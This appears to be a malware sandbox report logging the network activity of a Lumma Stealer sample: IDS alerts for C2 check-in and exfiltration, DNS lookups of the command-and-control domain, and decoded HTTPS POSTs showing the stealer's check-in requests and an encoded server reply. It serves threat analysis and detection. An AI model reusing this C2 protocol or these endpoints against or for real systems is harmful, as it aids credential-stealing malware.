                                                                                                            2024-12-26T12:49:24.546737+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849704172.67.165.185443TCP
                                                                                                            2024-12-26T12:49:25.875475+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849705172.67.165.185443TCP
                                                                                                            2024-12-26T12:49:26.668292+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849705172.67.165.185443TCP
                                                                                                            2024-12-26T12:49:26.668292+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849705172.67.165.185443TCP
                                                                                                            2024-12-26T12:49:28.543470+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707172.67.165.185443TCP
                                                                                                            2024-12-26T12:49:48.959861+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849707172.67.165.185443TCP
                                                                                                            2024-12-26T12:49:50.522564+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849711172.67.165.185443TCP
                                                                                                            2024-12-26T12:50:12.820235+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849713172.67.165.185443TCP
                                                                                                            2024-12-26T12:50:15.777767+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849714172.67.165.185443TCP
                                                                                                            2024-12-26T12:50:52.235124+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849714172.67.165.185443TCP
                                                                                                            2024-12-26T12:50:54.725222+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849776172.67.165.185443TCP
                                                                                                            2024-12-26T12:50:56.377606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849782172.67.165.185443TCP

                                                                                                            Network Port Distribution

                                                                                                            • Total Packets: 84
                                                                                                            • 443 (HTTPS)
                                                                                                            • 53 (DNS)
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 26, 2024 12:49:11.246949911 CET49704443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:11.246995926 CET44349704172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:11.247101068 CET49704443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:11.250770092 CET49704443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:11.250783920 CET44349704172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:12.560560942 CET44349704172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:12.560679913 CET49704443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:12.564630032 CET49704443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:12.564637899 CET44349704172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:12.564965010 CET44349704172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:12.610487938 CET49704443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:12.613548040 CET49704443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:12.613567114 CET49704443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:12.613686085 CET44349704172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:24.546734095 CET44349704172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:24.546823978 CET44349704172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:24.546894073 CET49704443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:24.549709082 CET49704443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:24.549734116 CET44349704172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:24.567912102 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:24.567945957 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:24.568056107 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:24.569281101 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:24.569292068 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:25.875380993 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:25.875474930 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:25.876950979 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:25.876960039 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:25.877454996 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:25.885807037 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:25.885829926 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:25.885905981 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.668292999 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.668340921 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.668374062 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.668401003 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.668427944 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.668441057 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.668454885 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.676147938 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.676244020 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.676309109 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.676322937 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.676398039 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.684585094 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.735495090 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.735516071 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.782413960 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.788016081 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.829298019 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.878473997 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.882165909 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.882234097 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.882242918 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.882256985 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.882348061 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.882369995 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.882441044 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.882694006 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.882694006 CET49705443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:26.882719994 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:26.882730007 CET44349705172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:27.121974945 CET49707443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:27.122011900 CET44349707172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:27.122117043 CET49707443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:27.122425079 CET49707443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:27.122435093 CET44349707172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:28.543230057 CET44349707172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:28.543469906 CET49707443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:28.545145988 CET49707443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:28.545167923 CET44349707172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:28.545444012 CET44349707172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:28.546931028 CET49707443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:28.547036886 CET49707443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:28.547075033 CET44349707172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:48.959566116 CET44349707172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:48.959651947 CET44349707172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:48.959702969 CET49707443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:48.959949017 CET49707443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:48.959971905 CET44349707172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:49.079025030 CET49711443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:49.079080105 CET44349711172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:49.079154015 CET49711443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:49.079524040 CET49711443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:49.079535007 CET44349711172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:50.522396088 CET44349711172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:50.522563934 CET49711443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:50.526665926 CET49711443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:50.526678085 CET44349711172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:50.526943922 CET44349711172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:50.536403894 CET49711443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:50.536557913 CET49711443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:50.536587954 CET44349711172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:49:50.536670923 CET49711443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:49:50.579341888 CET44349711172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:11.064418077 CET49711443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:11.511199951 CET49713443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:11.511244059 CET44349713172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:11.511353970 CET49713443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:11.511816025 CET49713443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:11.511831045 CET44349713172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:12.820116043 CET44349713172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:12.820235014 CET49713443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:12.822173119 CET49713443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:12.822181940 CET44349713172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:12.822987080 CET44349713172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:12.824361086 CET49713443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:12.824466944 CET49713443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:12.824526072 CET44349713172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:12.824626923 CET49713443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:12.824635029 CET44349713172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:13.902182102 CET44349713172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:13.902280092 CET44349713172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:13.902575970 CET49713443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:13.902808905 CET49713443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:13.902831078 CET44349713172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:14.454490900 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:14.454538107 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:14.454824924 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:14.455248117 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:14.455264091 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:15.777462006 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:15.777766943 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:15.783065081 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:15.783081055 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:15.783560038 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:15.819108009 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:15.819251060 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:15.819257021 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:52.235126972 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:52.235240936 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:52.235331059 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:52.240700006 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:52.240717888 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:53.419692039 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:53.419744015 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:53.419836998 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:53.420423031 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:53.420439959 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.725060940 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.725222111 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:54.726649046 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:54.726670027 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.726928949 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.844894886 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:54.894037962 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:54.894156933 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.894377947 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.894392967 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:54.894429922 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:55.070844889 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:55.070909977 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:55.071104050 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:55.072540998 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:55.072561026 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:56.377393007 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:56.377605915 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:56.379018068 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:56.379038095 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:56.379369974 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:56.384265900 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:56.384325981 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:56.384394884 CET49782443192.168.2.8172.67.165.185
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 26, 2024 12:49:11.101495028 CET5542553192.168.2.81.1.1.1
                                                                                                            Dec 26, 2024 12:49:11.240886927 CET53554251.1.1.1192.168.2.8
                                                                                                            Dec 26, 2024 12:50:11.279934883 CET5073753192.168.2.81.1.1.1
                                                                                                            Dec 26, 2024 12:50:11.509972095 CET53507371.1.1.1192.168.2.8

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 26, 2024 12:49:11.101495028 CET192.168.2.81.1.1.10xa7f4Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                            Dec 26, 2024 12:50:11.279934883 CET192.168.2.81.1.1.10xf210Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 26, 2024 12:49:11.240886927 CET1.1.1.1192.168.2.80xa7f4No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                                                                            Dec 26, 2024 12:49:11.240886927 CET1.1.1.1192.168.2.80xa7f4No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false
                                                                                                            Dec 26, 2024 12:50:11.509972095 CET1.1.1.1192.168.2.80xf210No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                                                                            Dec 26, 2024 12:50:11.509972095 CET1.1.1.1192.168.2.80xf210No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • mindhandru.buzz

                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.849704172.67.165.1854435272C:\Users\user\Desktop\P0SJULJxI0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:49:12 UTC262OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 8
                                                                                                            Host: mindhandru.buzz
                                                                                                            2024-12-26 11:49:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                            Data Ascii: act=life
                                                                                                            2024-12-26 11:49:24 UTC1127INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 26 Dec 2024 11:49:24 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=ad1tulqrge1up50t27nvq5i316; expires=Mon, 21 Apr 2025 05:36:03 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KvhaSm3Wyqk7q%2B%2BOAGGVXGzxIYGcaIjG9Gh%2FW292Ardi4q7XiQQdcEFBKefz2T2dDMWZP8GeBarbS%2BPLc9SH4EEY07BnrIe5M27fIXV3GqATHkdYXOy54wJub1tSu16A05E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f80d8a34f310f3d-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1483&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1896103&cwnd=131&unsent_bytes=0&cid=0decf941a8ac3876&ts=11998&x=0"
                                                                                                            2024-12-26 11:49:24 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                            Data Ascii: 2ok
                                                                                                            2024-12-26 11:49:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.849705172.67.165.1854435272C:\Users\user\Desktop\P0SJULJxI0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:49:25 UTC263OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 53
                                                                                                            Host: mindhandru.buzz
                                                                                                            2024-12-26 11:49:25 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                            2024-12-26 11:49:26 UTC1121INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 26 Dec 2024 11:49:26 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=hk5317vj109rnmsdpuhmisj4p4; expires=Mon, 21 Apr 2025 05:36:05 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7RL0actHrUce1c8lsv2A%2Bsn9emXcb7GlUR7Di53OUDK2WKlVa7vBitLR90O4aX5s4LudrQ3eeMkMvWVCRHpQU4vE99r5MYvpK92fBGAuwFy4Mht4X50%2BS2YyWHgLapl39pg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f80d8f689d78c9c-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1769&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1597374&cwnd=196&unsent_bytes=0&cid=f23bb209fc9d8007&ts=799&x=0"
                                                                                                            2024-12-26 11:49:26 UTC248INData Raw: 31 34 38 64 0d 0a 4b 69 4d 71 66 6a 33 6a 2b 53 32 55 35 4b 63 51 45 42 6f 51 47 59 35 73 2f 4a 79 70 6f 6c 7a 4e 4e 6e 70 79 34 75 57 47 34 30 56 52 41 56 78 63 42 39 66 56 44 2b 65 42 68 53 70 6b 61 47 56 38 6f 6b 36 64 2b 49 75 59 4f 71 78 61 43 52 66 4f 78 2f 43 4f 5a 78 42 46 53 78 4a 4f 68 74 55 50 38 5a 79 46 4b 6b 74 68 4d 6e 7a 67 54 73 61 2b 7a 4d 67 2b 72 46 6f 59 45 34 6d 4b 39 6f 38 6d 51 6b 39 4e 46 6c 69 41 6e 55 7a 34 69 63 4a 31 64 58 74 36 64 2b 63 42 6c 50 47 4c 6a 6e 36 6f 54 46 68 49 77 4b 6a 6a 6c 79 52 6e 51 6c 6b 56 48 35 37 56 56 72 61 42 79 54 49 71 4f 48 46 38 37 41 43 61 2b 4d 4c 4b 4e 4b 56 53 47 52 61 49 6c 65 2b 46 4c 55 4a 42 54 68 64 53 69 59 6c 42 38 6f 37 4a 63 33 39 37 4d 6a 57 73 43 59 61 2b 6b 34
                                                                                                            Data Ascii: 148dKiMqfj3j+S2U5KcQEBoQGY5s/JypolzNNnpy4uWG40VRAVxcB9fVD+eBhSpkaGV8ok6d+IuYOqxaCRfOx/COZxBFSxJOhtUP8ZyFKkthMnzgTsa+zMg+rFoYE4mK9o8mQk9NFliAnUz4icJ1dXt6d+cBlPGLjn6oTFhIwKjjlyRnQlkVH57VVraByTIqOHF87ACa+MLKNKVSGRaIle+FLUJBThdSiYlB8o7Jc397MjWsCYa+k4
                                                                                                            2024-12-26 11:49:26 UTC1369INData Raw: 42 74 6e 56 63 4a 41 5a 57 4b 39 49 64 6e 56 77 39 52 58 46 69 4e 32 78 65 32 6a 73 6c 38 64 33 74 39 66 4f 30 4f 6a 50 48 4c 77 7a 61 6e 55 42 49 66 6a 34 6a 71 69 79 42 41 53 45 38 54 57 49 6d 64 51 50 58 47 69 7a 4a 31 59 44 49 6a 72 43 36 4f 2f 63 6a 55 4d 37 34 55 42 31 36 5a 78 2b 4f 4e 5a 78 41 42 54 68 4a 65 6a 4a 74 64 2f 6f 33 4f 64 32 42 7a 65 33 62 68 44 70 50 30 78 4d 4d 2b 71 46 34 53 48 34 71 44 36 59 77 68 53 45 45 49 55 68 2b 47 67 77 2b 75 78 75 5a 33 59 6e 39 2b 62 61 34 30 33 75 47 46 32 58 36 6f 57 46 68 49 77 49 2f 68 67 69 52 44 54 6b 73 55 56 4a 4f 62 58 66 43 4c 77 47 42 30 66 58 78 78 37 78 79 55 38 4d 33 44 4e 36 52 64 48 52 65 45 78 36 72 42 49 46 41 42 45 46 78 2b 6a 4a 42 44 2f 4a 48 46 4d 6d 30 32 61 7a 76 72 41 74 36 6d 69
                                                                                                            Data Ascii: BtnVcJAZWK9IdnVw9RXFiN2xe2jsl8d3t9fO0OjPHLwzanUBIfj4jqiyBASE8TWImdQPXGizJ1YDIjrC6O/cjUM74UB16Zx+ONZxABThJejJtd/o3Od2Bze3bhDpP0xMM+qF4SH4qD6YwhSEEIUh+Ggw+uxuZ3Yn9+ba403uGF2X6oWFhIwI/hgiRDTksUVJObXfCLwGB0fXxx7xyU8M3DN6RdHReEx6rBIFABEFx+jJBD/JHFMm02azvrAt6mi
                                                                                                            2024-12-26 11:49:26 UTC1369INData Raw: 55 56 6c 43 48 6e 36 54 5a 5a 32 4a 43 58 42 39 56 77 36 35 4d 2b 49 6a 43 5a 44 4a 6e 50 47 4b 73 43 5a 4b 2b 6b 34 41 7a 72 6c 77 65 41 6f 2b 4b 35 34 38 70 52 30 52 48 46 46 2b 42 6c 6b 72 79 6a 63 35 78 66 33 78 67 63 65 77 47 6d 2f 2f 42 79 6e 37 68 46 42 38 49 77 4e 2b 6b 73 44 42 44 41 33 30 66 55 59 2b 63 57 62 61 5a 69 32 73 79 66 33 34 37 74 45 36 54 39 73 37 46 4d 61 35 65 46 68 57 4b 69 2b 79 50 4a 46 70 4f 54 42 78 54 69 5a 46 43 2b 49 4c 4e 65 33 6c 7a 64 48 76 74 42 4e 36 77 69 38 63 6d 37 77 78 59 4a 49 65 4c 36 59 35 6c 66 55 4a 47 45 6c 69 58 32 31 43 34 6e 34 56 31 66 6a 67 71 4f 2b 41 48 6e 76 58 42 78 44 36 6f 57 52 30 54 68 34 54 70 68 69 31 47 52 6b 77 51 56 6f 79 64 54 2f 47 43 77 47 42 33 63 58 35 33 72 45 44 65 2b 64 4f 41 5a 75
                                                                                                            Data Ascii: UVlCHn6TZZ2JCXB9Vw65M+IjCZDJnPGKsCZK+k4AzrlweAo+K548pR0RHFF+Blkryjc5xf3xgcewGm//Byn7hFB8IwN+ksDBDA30fUY+cWbaZi2syf347tE6T9s7FMa5eFhWKi+yPJFpOTBxTiZFC+ILNe3lzdHvtBN6wi8cm7wxYJIeL6Y5lfUJGEliX21C4n4V1fjgqO+AHnvXBxD6oWR0Th4Tphi1GRkwQVoydT/GCwGB3cX53rEDe+dOAZu
